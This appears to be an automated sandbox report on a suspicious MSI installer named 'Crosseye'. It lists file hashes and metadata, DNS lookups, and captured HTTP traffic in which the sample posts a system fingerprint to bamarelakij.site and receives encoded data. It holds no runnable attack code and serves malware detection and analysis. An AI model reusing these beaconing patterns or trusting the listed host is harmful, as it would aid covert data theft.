Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Crosseye, Author: Snobbery Flunky, Keywords: Installer, Comments: This installer database contains the logic and data required to install Crosseye., Template: Intel;1033, Revision Number: {5E2B2133-C57F-46FB-BB7A-F28CBBECEB40}, Create Time/Date: Sun Jan 5 15:59:28 2025, Last Saved Time/Date: Sun Jan 5 15:59:28 2025, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
Entropy (8bit):	7.998677779855356
TrID:	Microsoft Windows Installer (60509/1) 88.31% Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:	cLm7ThwEvh.msi
File size:	9'654'272 bytes
MD5:	838a6db8b723abe92342cb4d59bd47df
SHA1:	3db057a1d57ff0c543da7cfd6a88e298797f6f9a
SHA256:	e04464a9c2236bdc798c112b4bfbe0d4265fe486154e3601d03e0e60cc1487ab
SHA512:	b98d3cbdbf8d5f72f6e56046d0def4d503c4cec54a8e2b2cd50439f9b220c23ec9bea0d0ba0598668530cb11022ed5522fc39150d8542cb7cce83655766c7851
SSDEEP:	196608:BiuWmfKM9Ig4IrXYvU/75MZYy6x5BMxJvjkSRb+clYqU3LVsIoB:wRpIDYvUj5M76xnMxptO3No
TLSH:	A0A63382EC963AC1D986B1385035103BF8830DE452A414E305D6F78B4AFE779E7F679A
File Content Preview:	........................>......................................................................................................................................................................................................................................

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 14:40:51.100164890 CET	192.168.2.4	1.1.1.1	0x895c	Standard query (0)	bamarelakij.site	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:00.418306112 CET	192.168.2.4	1.1.1.1	0xc44e	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:00.418962955 CET	192.168.2.4	1.1.1.1	0x840b	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:01.902421951 CET	192.168.2.4	1.1.1.1	0xe2a7	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:01.902573109 CET	192.168.2.4	1.1.1.1	0xf8c1	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jan 9, 2025 14:41:02.203126907 CET	192.168.2.4	1.1.1.1	0x45c8	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:02.203263044 CET	192.168.2.4	1.1.1.1	0xe0cc	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:03.371119976 CET	192.168.2.4	1.1.1.1	0x29d4	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.371696949 CET	192.168.2.4	1.1.1.1	0x3d93	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:03.379678965 CET	192.168.2.4	1.1.1.1	0x32	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.379803896 CET	192.168.2.4	1.1.1.1	0x25c4	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:03.386569023 CET	192.168.2.4	1.1.1.1	0xe331	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.386768103 CET	192.168.2.4	1.1.1.1	0xa2d4	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:03.407469034 CET	192.168.2.4	1.1.1.1	0x12f8	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.407763958 CET	192.168.2.4	1.1.1.1	0xe14c	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:04.632462978 CET	192.168.2.4	1.1.1.1	0x4067	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.632616997 CET	192.168.2.4	1.1.1.1	0x2027	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:04.632899046 CET	192.168.2.4	1.1.1.1	0x16e2	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.633284092 CET	192.168.2.4	1.1.1.1	0x7700	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:04.729366064 CET	192.168.2.4	1.1.1.1	0xc6b0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.729494095 CET	192.168.2.4	1.1.1.1	0xf23	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:41:04.858639002 CET	192.168.2.4	1.1.1.1	0x701a	Standard query (0)	assets2.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.858784914 CET	192.168.2.4	1.1.1.1	0xc3c7	Standard query (0)	assets2.msn.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 14:40:51.113601923 CET	1.1.1.1	192.168.2.4	0x895c	No error (0)	bamarelakij.site		172.67.174.91	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:40:51.113601923 CET	1.1.1.1	192.168.2.4	0x895c	No error (0)	bamarelakij.site		104.21.80.52	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:00.425479889 CET	1.1.1.1	192.168.2.4	0xc44e	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:00.426203012 CET	1.1.1.1	192.168.2.4	0x840b	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:01.909293890 CET	1.1.1.1	192.168.2.4	0xf8c1	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:01.909821987 CET	1.1.1.1	192.168.2.4	0xe2a7	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:02.210175037 CET	1.1.1.1	192.168.2.4	0x45c8	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:02.210175037 CET	1.1.1.1	192.168.2.4	0x45c8	No error (0)	googlehosted.l.googleusercontent.com		172.217.18.97	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:02.210233927 CET	1.1.1.1	192.168.2.4	0xe0cc	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.385615110 CET	1.1.1.1	192.168.2.4	0x29d4	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.385615110 CET	1.1.1.1	192.168.2.4	0x29d4	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.385615110 CET	1.1.1.1	192.168.2.4	0x29d4	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.385615110 CET	1.1.1.1	192.168.2.4	0x29d4	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:03.393163919 CET	1.1.1.1	192.168.2.4	0x32	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.393439054 CET	1.1.1.1	192.168.2.4	0x25c4	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.400027990 CET	1.1.1.1	192.168.2.4	0xe331	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.400840044 CET	1.1.1.1	192.168.2.4	0xa2d4	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.420897961 CET	1.1.1.1	192.168.2.4	0xe14c	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:03.421278000 CET	1.1.1.1	192.168.2.4	0x12f8	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:04.639784098 CET	1.1.1.1	192.168.2.4	0x4067	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.639784098 CET	1.1.1.1	192.168.2.4	0x4067	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.639816046 CET	1.1.1.1	192.168.2.4	0x2027	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:41:04.640748978 CET	1.1.1.1	192.168.2.4	0x16e2	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.640748978 CET	1.1.1.1	192.168.2.4	0x16e2	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.640779018 CET	1.1.1.1	192.168.2.4	0x7700	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:41:04.737190008 CET	1.1.1.1	192.168.2.4	0xc6b0	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.737190008 CET	1.1.1.1	192.168.2.4	0xc6b0	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.737224102 CET	1.1.1.1	192.168.2.4	0xf23	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:41:04.750870943 CET	1.1.1.1	192.168.2.4	0x4ceb	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:04.750870943 CET	1.1.1.1	192.168.2.4	0x4ceb	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:41:04.870229959 CET	1.1.1.1	192.168.2.4	0xc3c7	No error (0)	assets2.msn.com	assets2.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:41:04.871862888 CET	1.1.1.1	192.168.2.4	0x701a	No error (0)	assets2.msn.com	assets2.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:00.253731012 CET	1.1.1.1	192.168.2.4	0x1	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:00.253731012 CET	1.1.1.1	192.168.2.4	0x1	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:40:51 UTC	328	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Length: 147 Host: bamarelakij.site
2025-01-09 13:40:51 UTC	147	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 00 00 00 00 00 fe ff ff ff 00 00 00 00 60 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 3c 20 95 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd< $9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:40:52 UTC	836	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:40:51 GMT Transfer-Encoding: chunked Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsUUVaaoWzz2l3iUIfhbEXhTgwnddu5avSGyiAGItmGiBT%2BVqUg2sQZSoAiGC%2FWjIj9Y6LGOex%2BDdvWMm%2BUbG7l6Ju6uo8P%2BfZgOR2ztHyxbCvu1%2BgKfS4WTbmYrtTlQwsN%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d76f0e93436a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1613&rtt_var=618&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1111&delivery_rate=1753753&cwnd=184&unsent_bytes=0&cid=8329f95f0eebe869&ts=451&x=0"
2025-01-09 13:40:52 UTC	533	IN	Data Raw: 33 32 66 32 0d 0a 00 00 00 00 4d 3d c5 30 00 00 00 00 1c 8a 00 00 15 00 a0 0a ef 06 42 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae a0 0a 65 06 ab 4b 3d 77 95 29 a1 1d 2e 28 39 b7 b3 39 b0 b6 10 23 b4 36 b2 b9 2e 21 39 b0 3b b2 a9 b7 33 3a bb b0 39 b2 2e 21 39 b0 3b b2 96 21 39 b7 bb b9 b2 39 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e 31 39 b0 3b b2 17 b2 3c b2 15 00 a8 0a 7e 02 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 11 a8 0a 26 24 7c 11 5e 5e 57 32 46 f7 66 c1 0a 2d 12 13 15 00 c9 08 54 0d 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 ae c9 08 50 5c 35 5d 39 a0 03 48 40 8f 2f 8d 6d d3 46 69 11 00 97 07 96 04 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 97 07 6a bf 75 c5 24 b9 dc 47 15 00 d7 0c 62 07 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 ae d7 0c 5e 9e 1b 7e f4 59 a1 a3 2a 4d 01 ae a0 2a Data Ascii: 32f2M=0B&eK=w).(99#6.!9;3:9.!9;!99.886:7.19;<~&&$\|^^W2Ff-T&P\5]9H@/mFi&ju$Gb&^~YM
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: b5 bc 31 99 32 1c 31 31 bb b2 15 00 38 0b ab 08 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 a0 38 0b 65 06 ab 4b 3d 77 95 29 a9 b2 3a 3a b4 37 b3 b9 11 00 14 0d 54 00 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 fd 14 0d d7 f8 35 e6 99 fe 9c 64 15 00 a6 01 fd 0d 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 a0 a6 01 35 45 f7 98 f2 ee 84 03 45 96 ed 48 a6 9d c1 22 15 00 ca 05 3f 0c 0c 00 08 02 1b 16 07 1f 0b 26 d6 d6 11 ca 05 65 06 ab 4b 3d 77 95 29 b9 b2 39 3b b4 b1 b2 17 b1 b7 37 33 15 00 e3 09 cd 09 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 4e e3 09 65 06 ab 4b 3d 77 95 29 15 17 bb b0 36 36 b2 3a 15 00 ec 0e 74 0d 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 a0 ec 0e fd 42 c7 ce e2 2f 4d 5a 8d 91 dd 1e b6 5c 08 7b 11 00 f2 0e 60 08 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 4e f2 0e e8 5b 3e c2 a6 5d Data Ascii: 12118&8eK=w)::7T&5d&5EEH"?&eK=w)9;73&NeK=w)66:t&B/MZ\{`&N[>]
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: bc 22 b2 b9 b5 11 00 c9 0a 01 0a 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 fd c9 0a 3b 5b c8 86 64 7a 61 04 15 00 3e 0f cc 06 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 a0 3e 0f 88 48 7c 22 bf 27 e4 94 f9 9b 66 f2 eb 54 a1 b5 11 00 8f 00 25 04 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 8f 00 15 9d 2c 85 5a 7a 70 02 15 00 f3 05 5d 0b 09 00 08 02 1b 16 07 1f 0b 26 d6 d6 f2 f3 05 65 06 ab 4b 3d 77 95 29 b7 38 b2 39 b0 17 b2 3c b2 11 00 d4 0c 72 00 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 4e d4 0c 87 80 23 e7 c8 86 8a 65 11 00 9a 0f f2 07 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 9a 0f cc af c8 a7 6b aa 61 25 11 00 9b 08 47 0f 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 9b 08 17 6c e5 2f 58 8b b9 a8 15 00 d1 0c 3a 06 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 4e d1 0c aa f1 e1 a8 95 c2 ef cf de Data Ascii: "&;[dza>&>H\|"'fT%&,Zzp]&eK=w)89<r&N#e&ka%G&l/X:&N
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: 02 3e 00 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 d1 b7 02 23 2b 61 07 6d 2d c8 85 15 00 d7 01 59 0d 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 a0 d7 01 65 06 ab 4b 3d 77 95 29 a0 36 36 10 a6 b0 b4 36 11 00 fd 0e 02 0e 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 4e fd 0e 5c a1 1a dc 12 a7 b3 5e 15 00 84 0d aa 0b 0a 00 08 02 1b 16 07 1f 0b 26 d6 d6 a0 84 0d 65 06 ab 4b 3d 77 95 29 15 b6 b2 3a b0 32 b0 3a b0 15 15 00 93 06 05 07 0e 00 08 02 1b 16 07 1f 0b 26 d6 d6 e5 93 06 65 06 ab 4b 3d 77 95 29 26 b7 b1 b0 36 22 b4 39 b2 b1 3a b7 39 bc 15 00 a1 03 0e 04 1b 00 08 02 1b 16 07 1f 0b 26 d6 d6 4e a1 03 65 06 ab 4b 3d 77 95 29 bb b0 36 36 b2 3a b9 2e 21 b4 3a b1 b7 b4 37 a1 b7 39 b2 2e bb b0 36 36 b2 3a b9 15 00 3f 0f 22 09 0e 00 08 02 1b 16 07 1f 0b 26 d6 d6 6c 3f 0f 65 06 ab 4b Data Ascii: >&#+am-Y&eK=w)666&N\^&eK=w):2:&eK=w)&6"9:9&NeK=w)66:.!:79.66:?"&l?eK
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: 16 07 1f 0b 26 d1 d1 11 ea 0c 27 84 a6 40 69 82 0f c2 11 00 f2 0b bb 05 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 4e f2 0b 12 3f ba ee 5c 39 13 6c 15 00 c5 03 b2 05 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 50 c5 03 65 06 ab 4b 3d 77 95 29 38 39 b7 33 b4 36 b2 b9 11 00 fa 0a 8f 0c 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 6c fa 0a dc 60 ac 59 99 66 05 db 15 00 f1 0a 69 03 06 00 08 02 1b 16 07 1f 0b 26 d6 d6 4e f1 0a 65 06 ab 4b 3d 77 95 29 a2 3c b7 32 ba b9 15 00 75 05 02 00 1a 00 08 02 1b 16 07 1f 0b 26 d6 d6 e5 75 05 65 06 ab 4b 3d 77 95 29 28 39 b7 b3 39 b0 b6 b9 2e ab b4 37 a9 a1 28 2e ab b4 37 a9 a1 28 17 b4 37 b4 15 00 c5 04 8f 07 09 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae c5 04 65 06 ab 4b 3d 77 95 29 a6 a0 27 a4 23 a2 a9 2a 15 15 00 ef 01 15 04 01 00 08 02 1b 16 07 1f Data Ascii: &'@i&N?\9l&PeK=w)8936&l`Yfi&NeK=w)<2u&ueK=w)(99.7(.7(7&eK=w)'#*
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: 26 c0 c0 a0 3e 0d 41 5a 4c a1 49 56 4e 55 35 89 56 71 1d 25 0b 74 15 00 f1 03 e1 0c 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 50 f1 03 65 06 ab 4b 3d 77 95 29 38 39 b7 33 b4 36 b2 b9 15 00 51 0e e8 0c 09 00 08 02 1b 16 07 1f 0b 26 d6 d6 50 51 0e 65 06 ab 4b 3d 77 95 29 b9 b2 b1 b6 b7 32 17 32 31 15 00 f8 0a d5 00 0b 00 08 02 1b 16 07 1f 0b 26 d6 d6 e5 f8 0a 65 06 ab 4b 3d 77 95 29 28 39 b7 3c bc a6 b2 3a 34 b7 32 15 00 eb 05 f1 06 09 00 08 02 1b 16 07 1f 0b 26 d6 d6 11 eb 05 65 06 ab 4b 3d 77 95 29 ba b9 b2 39 17 b1 b7 37 33 11 00 48 01 84 09 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 48 01 20 53 91 08 6e 55 38 8a 15 00 be 0d 24 0b 24 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae be 0d 65 06 ab 4b 3d 77 95 29 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a Data Ascii: &>AZLIVNU5Vq%t&PeK=w)8936Q&PQeK=w)221&eK=w)(9<:42&eK=w)973H&H SnU8$$&eK=w)6.49.886:
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: 8a 4a 33 51 d8 7a 8d e4 de 39 76 70 11 00 58 0a 68 02 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 ae 58 0a 4b c3 a4 7d 04 24 f8 fa 11 00 9f 04 65 09 04 00 04 02 1b 16 07 1f 0b 26 d1 d1 6c 9f 04 38 fd 90 24 77 fb 39 a6 15 00 fc 0d 99 07 06 00 08 02 1b 16 07 1f 0b 26 d6 d6 6c fc 0d 65 06 ab 4b 3d 77 95 29 38 39 b2 33 b4 3c 15 00 3e 09 34 06 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 2f 3e 09 88 46 25 d7 35 c3 21 51 fc 95 3f 07 61 b0 64 70 15 00 85 0d 9f 02 08 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae 85 0d 65 06 ab 4b 3d 77 95 29 38 39 b7 33 b4 36 b2 b9 15 00 ca 00 5e 02 04 00 08 02 1b 16 07 1f 0b 26 d6 d6 a0 ca 00 65 06 ab 4b 3d 77 95 29 15 17 32 31 15 00 67 00 73 05 35 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae 67 00 65 06 ab 4b 3d 77 95 29 a1 1d 2e 28 39 b7 b3 39 b0 b6 10 23 b4 36 Data Ascii: J3Qz9vpXh&XK}$e&l8$w9&leK=w)893<>4&/>F%5!Q?adp&eK=w)8936^&eK=w)21gs5&geK=w).(99#6
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: 2b 28 27 af 15 15 00 db 00 27 0e 05 00 08 02 1b 16 07 1f 0b 26 d6 d6 a0 db 00 65 06 ab 4b 3d 77 95 29 2a 39 b0 b9 34 15 00 5e 0d 33 07 21 00 08 02 1b 16 07 1f 0b 26 d6 d6 6c 5e 0d 65 06 ab 4b 3d 77 95 29 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 2a b2 36 b2 b3 39 b0 b6 2e 22 b2 b9 b5 3a b7 38 2e 3a 32 b0 3a b0 15 00 68 05 4b 0b 11 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae 68 05 65 06 ab 4b 3d 77 95 29 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 15 00 b2 09 5a 06 11 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae b2 09 65 06 ab 4b 3d 77 95 29 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 15 00 a2 02 e6 05 0a 00 08 02 1b 16 07 1f 0b 26 d6 d6 f2 a2 02 65 06 ab 4b 3d 77 95 29 aa b9 b2 39 96 a0 b3 b2 37 3a 15 00 ee 0a 12 0e 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 a0 ee 0a 02 f3 Data Ascii: +(''&eK=w)94^3!&l^eK=w)79.69.":8.:2:hK&heK=w)49199Z&eK=w)49199&eK=w)97:&
2025-01-09 13:40:52 UTC	1369	IN	Data Raw: b2 17 b2 3c b2 15 00 d0 00 26 03 4f 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae d0 00 65 06 ab 4b 3d 77 95 29 a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 15 00 86 0b 23 0e 0d 00 08 02 1b 16 07 1f 0b 26 d6 d6 f2 86 0b 65 06 ab 4b 3d 77 95 29 36 b4 31 39 b2 bb b7 36 33 17 b2 3c b2 15 00 39 0f 92 00 08 00 08 02 1b 16 07 1f 0b 26 c0 c0 fd 39 0f 86 a2 11 bb c7 d6 1e d7 f2 71 0b 6b 93 a5 5b f6 15 00 67 01 8f 0f 09 00 08 02 1b 16 07 1f 0b 26 d6 d6 2f 67 01 65 06 ab 4b 3d 77 95 29 a9 3a b2 b0 b6 28 b0 3a 34 15 00 1c 08 bc 09 07 00 08 02 1b 16 07 1f 0b 26 d6 d6 ae 1c 08 65 06 ab 4b Data Ascii: <&O&eK=w)72<2"!.49<:7754281835834321672<2216;621#&eK=w)61963<9&9qk[g&/geK=w):(:4&eK

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:40:53 UTC	408	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 208 Host: bamarelakij.site
2025-01-09 13:40:53 UTC	208	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 01 95 00 00 00 bc 9d a0 1a 08 00 00 00 95 00 00 00 45 ab c5 66 71 e3 95 29 00 00 00 00 5e ce 50 0d 00 00 00 00 81 00 00 00 49 60 48 00 00 00 00 5e ce 50 0d 00 00 00 00 31 00 00 00 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Efq)^PI`H^P1(((
